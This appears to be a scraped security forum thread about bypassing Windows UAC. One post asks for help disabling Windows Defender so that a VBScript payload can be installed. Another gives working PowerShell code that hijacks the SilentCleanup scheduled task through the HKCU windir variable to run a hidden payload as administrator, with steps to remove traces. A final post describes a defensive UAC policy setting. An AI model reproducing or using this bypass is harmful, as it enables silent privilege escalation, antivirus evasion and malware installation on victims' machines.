Search the Community

I'd like to request assistance regarding how I can bypass windows 10 defender while I am actually tying to execute a vbscript payload. I have two VBS script. One the main Payload and the second is a VBScript that disabled windows antivirus but it raises UAC prompt. I am trying to bypass the UAC prompt then execute the VBscript to Disable the windows defender before downloading intstalling the main payload that get blocked by windows anti-malware. I would appreciate you assitance about this. Best Regards.

Hi everyone! First of all, sorry if my English is not that good, It's not my main language. I just signed up to the forum to post this, after watching the video Darren made about a payload that changes the Desktop background. I had this idea after he mentioned that the Lockscreen background could not be changed due to the fact that there isn't a "stable" method and it needed admin privileges. So I made a script which, when opened as standard user, respawns itself in a hidden window with full admin privileges and executes whatever payload you put in it. Here it is: if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator } else { $registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } Explanation: There's a task in Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe Since it runs as Users, and we can control user's environment variables, we can change %windir% (normally pointing to C:\Windows) to point to whatever we want, and it'll run as admin. The first line if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) basically checks if we are admin, so that the script can detect whether it has been called by the user or by the task, and do stuff accordingly. Everything that need admin privs goes in this block of the if statement, while in the "else" block goes what can be run as standard user, including the bypass itself. The "Set-ItemProperty" line creates a new Registry Key "HKCU:\Environment\windir" in order to change the %windir% variable value to the command we want to be run as admin, in this case powershell -ep bypass -w h $PSCommandPath;# "$PSCommandPath" evaluates to our script path, "-ep bypass" is equal to "-ExecutionPolicy bypass" and "-w h" to "-WindowStyle hidden". The ";#" part is needed to comment out the rest of the path of the task from the command. So, in the end, the task's execution path evaluates to: powershell -ExecutionPolicy bypass -WindowStyle hidden <path of the script> ;#\System32\cleanmgr.exe The "schtasks" command will simply ask Windows to run the task with the now modified %windir% and "Remove-ItemProperty" will just delete the reg key after the task has been executed in order to not break other things and/or leave traces of the "attack". When the task runs, it will call the script with full fledged admin privs, so now the first block of the if statement is executed and our payload can do whatever we want. Note: In order to work, the code must be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog. However, if our payload is small enough to fit entirely in the %windir% variable, we can reduce the whole script to just the three fundamental lines, i.e. "Set-ItemProperty", "schtasks" and "Remove-ItemProperty". (Idk if it can fit in the run dialog though) Note2: I think it could break if the the script is in a path that contains spaces, but I think it's easily fixable by escaping the $PSCommandPath in the $Value variable

So I lost my USB rubber ducky(bought at Derbycon 1, not sure where I put it after moving few times) but was wondering with all these UAC bypass attacks these days, can it be blocked. I don't have a ducky to test, but even just manually typing common ducky scripts for testing, I haven't been able to bypass UAC after making some changes to beef it up a bit. Most of the time the bypass seems to work is because of admin level not, by default, required to use a password for UAC, and instead, only click ok for the pop-up. However, you can change this in the Local Security Policies settings. What I'd like to see, and maybe someone already posted this, so I could be making a duplicate point already given and I apologize, is someone test this and show me that you can bypass the following settings. Hit the windows key, and in search type "Local Security Policy" Now drill down to "local policies" > security options > UAC: Behavior on prompt (for both admin & normal users) > Change to prompt for credentials on both. Now try your rubber ducky. Does it still bypass UAC? (It shouldn't be able to, but I haven't tested this extensively). Post your thoughts, and any ducky script if you find a way to bypass UAC with the above settings turned on. These are things I am going to start turning on for all machines I own and setup for others in the future since I can't see a way to bypass short of remote/elevated attack channels, this should stop all HID based UAC Bypass attacks that don't run executables, and work solely on keystrokes alone.